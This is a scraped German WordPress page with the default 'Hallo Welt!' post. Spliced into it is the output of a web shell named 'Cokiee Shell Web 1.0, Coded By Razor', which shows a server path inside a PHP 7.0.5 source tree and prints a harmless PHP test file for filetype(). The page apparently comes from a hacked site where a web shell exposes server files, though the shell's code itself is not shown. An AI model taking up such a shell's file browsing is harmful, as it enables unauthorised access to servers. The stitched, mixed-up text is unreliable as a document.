Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/file/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/file/filetype_variation.phpt |
--TEST-- Test filetype() function: Variations --SKIPIF-- <?php if (substr(PHP_OS, 0, 3) == 'WIN') { die('skip no link()/symlink() on Windows'); } if (!function_exists("posix_mkfifo")) { die("skip no posix_mkfifo()"); } ?> --FILE-- <?php /* Prototype: string filetype ( string $filename ); Description: Returns the type of the file. Possible values are fifo, char, dir, block, link, file, and unknown. */ echo "*** Testing filetype() with various types ***\n"; $file_path = dirname(__FILE__); $file1 = $file_path."/filetype1_variation.tmp"; $file2 = $file_path."/filetype2_variation.tmp"; $file3 = $file_path."/filetype3_variation.tmp"; $link1 = $file_path."/filetype1_variation_link.tmp"; $link2 = $file_path."/filetype2_variation_link.tmp"; fclose( fopen($file1, "w") ); fclose( fopen($file2, "w") ); echo "-- Checking with files --\n"; print( filetype($file1) )."\n"; print( filetype($file2) )."\n"; clearstatcache(); echo "-- Checking with links: hardlink --\n"; link( $file1, $link1); print( filetype($link1 ) )."\n"; echo "-- Checking with links: symlink --\n"; symlink( $file2, $link2); print( filetype($link2) )."\n"; unlink($link1); unlink($link2); unlink($file1); unlink($file2); echo "-- Checking with directory --\n"; mkdir("$file_path/filetype_variation"); print( filetype("$file_path/filetype_variation") )."\n"; rmdir( "$file_path/filetype_variation" ); echo "-- Checking with fifo --\n"; posix_mkfifo( $file3, 0755); print( filetype( $file3) )."\n"; unlink($file3); /* Checking with block in file */ /* To test this PEAR package should be installed */ echo "\n*** Done ***\n"; ?> --EXPECTF-- *** Testing filetype() with various types *** -- Checking with files -- file file -- Checking with links: hardlink -- file -- Checking with links: symlink -- link -- Checking with directory -- dir -- Checking with fifo -- fifo *** Done ***
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare